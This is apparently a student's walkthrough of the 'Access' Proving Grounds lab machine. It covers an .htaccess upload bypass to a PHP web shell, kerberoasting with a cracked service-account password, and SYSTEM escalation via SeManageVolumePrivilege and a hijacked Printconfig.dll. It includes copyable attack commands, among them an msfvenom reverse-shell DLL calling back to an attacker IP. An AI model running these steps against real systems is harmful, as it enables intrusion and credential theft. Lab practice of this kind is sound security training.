Access

Source: Proving Grounds OS: Windows Community Rating: Very Hard

Enumeration & Reconnaissance

• Started with autorecon again. it showed lots and lots of ports, so there's no point in listing them all.

Service Analysis

• I began with HTTP (80), which was a simple page featuring a "buy ticket" function that included a file upload capability.

Buy Tickets

• The fuzzers in the background also exposed the "uploads" directory, so cool, I guess we need to upload a shell.

Gaining Initial Access

• I first tried uploading a PHP shell, but nothing worked. I attempted known file upload restriction bypasses, null byte, different extension names, double extensions, but none of them did the trick.

• Then I tried another approach: what if I created a new extension that gets treated as PHP? This is where .htaccess comes in handy. I created a .htaccess file with the following content:

AddType application/x-httpd-php .puss

.htaccess File

• I then uploaded this file and it worked, the file got uploaded (note that it doesn’t appear in the uploads directory because it’s a hidden file).

.htaccess Uploaded

• Now that this is in place, I can upload files with the .puss extension and they will be treated as PHP files. So I uploaded my shell again, this time with the .puss extension, and it worked. Now I have a web shell. Using the web shell, I uploaded a reverse shell and ran it, now we got a reverse shell.

Webshell

• I checked the user I got the shell as and it was access\svc_apache. I then uploaded winPEAS and ran it to check for privilege escalation. It showed that we are in a domain, access.offsec (no surprises, I knew it was an AD machine I was preparing for), and there is another user, svc_mssql.

Reverse Shell

Lateral Movement & Privilege Escalation

• I tried the FullPowers script that attempts to restore privileges of service accounts, but that didn’t work. I checked for other PE vectors using the svc_apache account but nothing obvious hit, so I turned to lateral movement targeting svc_mssql. Since it’s an Active Directory machine, I applied some techniques I had been learning over the past few weeks.

Full Powers

• I started with kerberoasting. I uploaded rubeus.exe and ran:

.\Rubeus.exe kerberoast /outfile:hash #Got the hash
sudo hashcat -m 13100 hash /usr/share/wordlists/rockyou.txt -r /usr/share/hashcat/rules/best64.rule --force #Crack the hash

Getting the Hash

• This revealed the password to be trustno1.

Password Cracked

• Now we have credentials for svc_mssql. I tried using these newly acquired credentials through various methods:

evil-winrm -i 192.168.113.187 -u svc_mssql -p trustno1
impacket-psexec svc_mssql@192.168.113.187

Trying Evil-winrm

Trying impacket-psexec

• Both didn’t work, the account had no access to the SMB shares, so that failed. I then tried runas:

runas /user:access.offsec\svc_mssql cmd.exe

Can't Type the Password

• That wouldn’t let me type the password. I then tried a new tool, Invoke-RunasCs. I uploaded the PowerShell script, ran:

powershell -ep bypass
Import-Module .\Invoke-RunasCs.ps1
Invoke-RunasCs -Username svc_mssql -Password trustno1 -Command "C:\Users\Public\shell1.exe"

Getting svc_mssql Access

• Now that we are in as svc_mssql. I checked around for further privilege escalation vectors but there was no the usual impersonate privilege. I tried FullPowers but still nothing. After searching further, I discovered I could use the SeManageVolumePrivilege to escalate.

• Someone had made a PoC on GitHub that granted access to the entire C: drive: .\SeManageVolumeExploit.exe

Access Over C: Drive

• Now that we have access over the C: drive we have multiple ways to escalate our privilege. According to the PoC, one method involved overwriting a DLL. The steps were:

msfvenom -p windows/x64/shell_reverse_tcp LHOST=192.168.45.201 LPORT=9915 -f dll -o shell.dll #Create a dll reverse shell.
C:\Windows\System32\spool\drivers\x64\3\Printconfig.dll #Replace the Printconfig.dll with the malicious dll.

#Initiate the PrintNotify object by executing the following PowerShell commands:   
$type = [Type]::GetTypeFromCLSID("{854A20FB-2D44-457D-992F-EF13785D2B51}")
$object = [Activator]::CreateInstance($type)

• Doing this, I got back a shell as SYSTEM.

Getting System Access

Lessons Learned

• File upload restrictions can sometimes be bypassed by redefining file types using .htaccess. This allowed me to execute PHP code from a non-standard extension.

• In AD environments, lateral movement using kerberoasting is an effective method to pivot from one service account to another.

• When standard privilege escalation tools (like FullPowers) don’t work, alternative vectors, such as abusing SeManageVolumePrivilege, can provide a path to SYSTEM.